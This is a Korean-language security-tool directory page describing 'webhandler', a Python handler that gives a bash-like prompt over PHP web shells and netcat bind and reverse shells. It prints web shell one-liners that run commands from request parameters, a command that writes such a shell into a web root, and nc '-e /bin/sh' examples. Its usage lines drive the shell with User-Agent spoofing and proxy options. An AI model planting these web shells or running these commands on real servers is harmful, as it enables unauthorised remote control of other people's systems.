Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
webhandler — PHP 시스템 함수를 사용하여 서버를 제어하는 Bash 시뮬레이터 | Kitploit
도구/GitHubGitHub/lnxg33k/webhandler
Payload GenerationIDS/IPS EvasionWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHublnxg33k/webhandler

webhandler

PHP 시스템 함수를 사용하여 서버를 제어하는 Bash 시뮬레이터

저장소 보기
100245년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WebHandler


PHP 시스템 함수를 위한 핸들러이자 'netcat' 대체 핸들러 My image

정보


WebHandler는 'Linux bash 프롬프트'를 시뮬레이션하여 다음을 처리합니다:

root@kitploit:~
- PHP 프로그램 실행 함수 _(예: `system`, `passthru`, `exec` 등)_
- 바인드 셸 연결
- 리버스 셸 연결

또 다른 기능은 HTTP 헤더의 "User-Agent" 필드를 스푸핑하는 것입니다. (--random-angent).

HTTP 프록시도 지원합니다 (--proxy http://<ip>:<port>)

  • WebHandler는 POST 및 GET 요청을 지원합니다:

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • WebHandler는 netcat 연결의 대체 수단입니다.

    바인드 연결 예시 (예: nc -lvvp 1234 -e /bin/sh)

    일반적으로 사용자는 다음과 같이 실행합니다:

    • netcat -l -p 1234
    • nc -lvvp 1234

    리버스 연결 예시 (예: nc 127.0.0.1 4321 -e /bin/sh)

    일반적으로 사용자는 다음과 같이 실행합니다:

    • netcat -l -p 4321
    • nc -lvvp 4321

사용법


  • --예제 파일:

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • --url은 GET 또는 POST 요청을 보낼 때 필수 인자입니다 (예: '웹 기반 PHP' 바인드 연결):

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • --listen은 연결을 기다릴 때 필수 인자입니다 (예: 리버스 'raw' 연결):

    • python webhandler.py --listen 1234

종속성


Python 버전이 2.7.x 미만인 경우 argparse 가 필요합니다 설치하려면 다음을 실행하세요: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse 또는 sudo pip --install argparse.

readline 은 선택 사항입니다. 이 모듈은 정교한 줄 편집 및 기록 기능을 제공하는 데 사용됩니다

git 은 선택 사항입니다. 이를 통해 프로젝트를 최신 상태로 유지할 수 있습니다

링크


Wiki

알려진 버그

도구 다운로드